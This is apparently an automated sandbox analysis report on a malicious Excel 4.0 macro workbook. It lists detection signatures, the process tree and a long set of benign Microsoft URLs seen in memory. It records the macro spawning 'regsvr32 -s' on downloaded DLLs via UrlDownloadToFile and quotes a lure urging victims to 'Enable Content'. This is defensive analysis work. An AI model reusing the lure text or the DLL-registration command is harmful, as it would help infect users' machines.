Loading ...

Play interactive tourEdit tour

Analysis Report audit-866445981.xlsb

Overview

General Information

Sample Name:audit-866445981.xlsb
Analysis ID:433270
MD5:e1fdc1cf780e50ec43eee2ee43dfc730
SHA1:2de4c0600e360e355cc2c26ffcfc5f378bf20db4
SHA256:aacfdf7e9a3ec72b953c651bfc27e7d84c46b8656170867eca64a7a09d8d1bcd
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Found abnormal large hidden Excel 4.0 Macro sheet
Sigma detected: Microsoft Office Product Spawning Windows Shell
Allocates a big amount of memory (probably used for heap spraying)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Registers a DLL
Sample execution stops while process was sleeping (likely an evasion)
Tries to load missing DLLs
Yara detected Xls With Macro 4.0

Classification

Process Tree

  • System is w10x64
  • EXCEL.EXE (PID: 6972 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • splwow64.exe (PID: 4048 cmdline: C:\Windows\splwow64.exe 12288 MD5: 8D59B31FF375059E3C32B17BF31A76D5)
    • regsvr32.exe (PID: 6240 cmdline: regsvr32 -s ..\covi1.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
    • regsvr32.exe (PID: 6216 cmdline: regsvr32 -s ..\covi2.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
app.xmlJoeSecurity_XlsWithMacro4Yara detected Xls With Macro 4.0Joe Security

    Sigma Overview

    System Summary:

    barindex
    Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
    Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: regsvr32 -s ..\covi1.dll, CommandLine: regsvr32 -s ..\covi1.dll, CommandLine|base64offset|contains: ,, Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 6972, ProcessCommandLine: regsvr32 -s ..\covi1.dll, ProcessId: 6240

    Signature Overview

    Click to jump to signature section

    Show All Signature Results
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior

    Software Vulnerabilities:

    barindex
    Document exploit detected (UrlDownloadToFile)Show sources
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXESection loaded: unknown origin: URLDownloadToFileAJump to behavior
    Document exploit detected (process start blacklist hit)Show sources
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe
    Source: excel.exeMemory has grown: Private usage: 1MB later: 72MB
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: http://weather.service.msn.com/data.aspx
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://addinsinstallation.store.office.com/app/download
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://analysis.windows.net/powerbi/api
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://api.aadrm.com/
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://api.addins.store.office.com/app/query
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://api.cortana.ai
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://api.diagnostics.office.com
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://api.diagnosticssdf.office.com
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://api.microsoftstream.com/api/
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://api.office.net
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://api.onedrive.com
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://apis.live.net/v5.0/
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://arc.msn.com/v4/api/selection
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://augloop.office.com
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://augloop.office.com/v2
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://autodiscover-s.outlook.com/
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://cdn.entity.
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://clients.config.office.net/
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://config.edge.skype.com
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://cortana.ai
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://cortana.ai/api
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://cr.office.com
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://dataservice.o365filtering.com
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://dataservice.o365filtering.com/
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://dev.cortana.ai
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://devnull.onenote.com
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://directory.services.
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://ecs.office.com/config/v2/Office
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://entitlement.diagnostics.office.com
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://globaldisco.crm.dynamics.com
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://graph.ppe.windows.net
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://graph.ppe.windows.net/
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://graph.windows.net
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://graph.windows.net/
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://incidents.diagnostics.office.com
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://lifecycle.office.com
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://login.microsoftonline.com/
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://login.windows.local
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://management.azure.com
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://management.azure.com/
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://messaging.office.com/
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://ncus.contentsync.
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://ncus.pagecontentsync.
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://officeapps.live.com
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://officeci.azurewebsites.net/api/
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://onedrive.live.com
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://onedrive.live.com/embed?
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://outlook.office.com/
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://outlook.office365.com/
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://pages.store.office.com/review/query
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://powerlift.acompli.net
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://settings.outlook.com
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://shell.suite.office.com:1443
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://skyapi.live.net/Activity/
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://staging.cortana.ai
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://store.office.cn/addinstemplate
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://store.office.com/addinstemplate
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://store.office.de/addinstemplate
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://store.officeppe.com/addinstemplate
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://tasks.office.com
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://templatelogging.office.com/client/log
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://web.microsoftstream.com/video/
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://webshell.suite.office.com
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://wus2.contentsync.
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://wus2.pagecontentsync.
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
    Source: EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drString found in binary or memory: https://www.odwebp.svc.ms

    System Summary:

    barindex
    Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
    Source: Screenshot number: 8Screenshot OCR: Enable Content WHY I CANNOT OPEN THIS DOCUMENT? W You are using iOS or Android, please use Desktop
    Found Excel 4.0 Macro with suspicious formulasShow sources
    Source: audit-866445981.xlsbInitial sample: EXEC
    Found abnormal large hidden Excel 4.0 Macro sheetShow sources
    Source: audit-866445981.xlsbInitial sample: Sheet size: 7504
    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
    Source: classification engineClassification label: mal68.expl.evad.winXLSB@7/10@0/0
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{1DEF494E-EF96-4585-9AD6-00D29E9CF4CE} - OProcSessId.datJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s ..\covi1.dll
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s ..\covi2.dll
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288Jump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s ..\covi1.dllJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s ..\covi2.dllJump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: audit-866445981.xlsbInitial sample: OLE zip file path = xl/media/image2.png
    Source: audit-866445981.xlsbInitial sample: OLE zip file path = xl/media/image3.png
    Source: audit-866445981.xlsbInitial sample: OLE zip file path = xl/media/image4.png
    Source: audit-866445981.xlsbInitial sample: OLE zip file path = xl/media/image5.png
    Source: audit-866445981.xlsbInitial sample: OLE zip file path = xl/media/image6.png
    Source: audit-866445981.xlsbInitial sample: OLE zip file path = xl/media/image1.png
    Source: audit-866445981.xlsbInitial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguagesJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s ..\covi1.dll
    Source: C:\Windows\splwow64.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
